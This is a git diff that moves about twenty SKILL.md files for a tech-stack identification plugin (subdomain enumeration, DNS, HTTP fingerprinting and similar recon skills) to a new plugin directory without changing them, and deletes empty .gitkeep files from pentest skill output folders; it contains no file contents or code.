plugins/techstack-identification/skills/conflict_resolver/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/devops_detector/SKILL.md b/plugins/techstack-identification/skills/devops_detector/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/devops_detector/SKILL.md rename to plugins/techstack-identification/skills/devops_detector/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/dns_intelligence/SKILL.md b/plugins/techstack-identification/skills/dns_intelligence/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/dns_intelligence/SKILL.md rename to plugins/techstack-identification/skills/dns_intelligence/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/domain_discovery/SKILL.md b/plugins/techstack-identification/skills/domain_discovery/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/domain_discovery/SKILL.md rename to plugins/techstack-identification/skills/domain_discovery/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/evidence_formatter/SKILL.md b/plugins/techstack-identification/skills/evidence_formatter/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/evidence_formatter/SKILL.md rename to plugins/techstack-identification/skills/evidence_formatter/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/frontend_inferencer/SKILL.md b/plugins/techstack-identification/skills/frontend_inferencer/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/frontend_inferencer/SKILL.md rename to plugins/techstack-identification/skills/frontend_inferencer/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/html_content_analysis/SKILL.md b/plugins/techstack-identification/skills/html_content_analysis/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/html_content_analysis/SKILL.md rename to plugins/techstack-identification/skills/html_content_analysis/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/http_fingerprinting/SKILL.md b/plugins/techstack-identification/skills/http_fingerprinting/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/http_fingerprinting/SKILL.md rename to plugins/techstack-identification/skills/http_fingerprinting/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/ip_attribution/SKILL.md b/plugins/techstack-identification/skills/ip_attribution/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/ip_attribution/SKILL.md rename to plugins/techstack-identification/skills/ip_attribution/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/javascript_dom_analysis/SKILL.md b/plugins/techstack-identification/skills/javascript_dom_analysis/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/javascript_dom_analysis/SKILL.md rename to plugins/techstack-identification/skills/javascript_dom_analysis/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/job_posting_analysis/SKILL.md b/plugins/techstack-identification/skills/job_posting_analysis/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/job_posting_analysis/SKILL.md rename to plugins/techstack-identification/skills/job_posting_analysis/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/json_report_generator/SKILL.md b/plugins/techstack-identification/skills/json_report_generator/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/json_report_generator/SKILL.md rename to plugins/techstack-identification/skills/json_report_generator/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/report_exporter/SKILL.md b/plugins/techstack-identification/skills/report_exporter/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/report_exporter/SKILL.md rename to plugins/techstack-identification/skills/report_exporter/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/security_posture_analyzer/SKILL.md b/plugins/techstack-identification/skills/security_posture_analyzer/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/security_posture_analyzer/SKILL.md rename to plugins/techstack-identification/skills/security_posture_analyzer/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/signal_correlator/SKILL.md b/plugins/techstack-identification/skills/signal_correlator/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/signal_correlator/SKILL.md rename to plugins/techstack-identification/skills/signal_correlator/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/subdomain_enumeration/SKILL.md b/plugins/techstack-identification/skills/subdomain_enumeration/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/subdomain_enumeration/SKILL.md rename to plugins/techstack-identification/skills/subdomain_enumeration/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/third_party_detector/SKILL.md b/plugins/techstack-identification/skills/third_party_detector/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/third_party_detector/SKILL.md rename to plugins/techstack-identification/skills/third_party_detector/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/tls_certificate_analysis/SKILL.md b/plugins/techstack-identification/skills/tls_certificate_analysis/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/tls_certificate_analysis/SKILL.md rename to plugins/techstack-identification/skills/tls_certificate_analysis/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/web_archive_analysis/SKILL.md b/plugins/techstack-identification/skills/web_archive_analysis/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/web_archive_analysis/SKILL.md rename to plugins/techstack-identification/skills/web_archive_analysis/SKILL.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/outputs/.gitkeep b/projects/pentest/.claude/skills/ai-threat-testing/outputs/.gitkeep deleted file mode 100644 index e69de29..0000000 diff --git a/projects/pentest/.claude/skills/authenticating/outputs/.gitkeep b/projects/pentest/.claude/skills/authenticating/outputs/.gitkeep deleted file mode 100644 index e69de29..0000000 diff --git a/projects/pentest/.claude/skills/hackerone/outputs/.gitkeep b/projects/pentest/.claude/skills/hackerone/outputs/.gitkeep deleted file mode 100644 index e69de29..0000000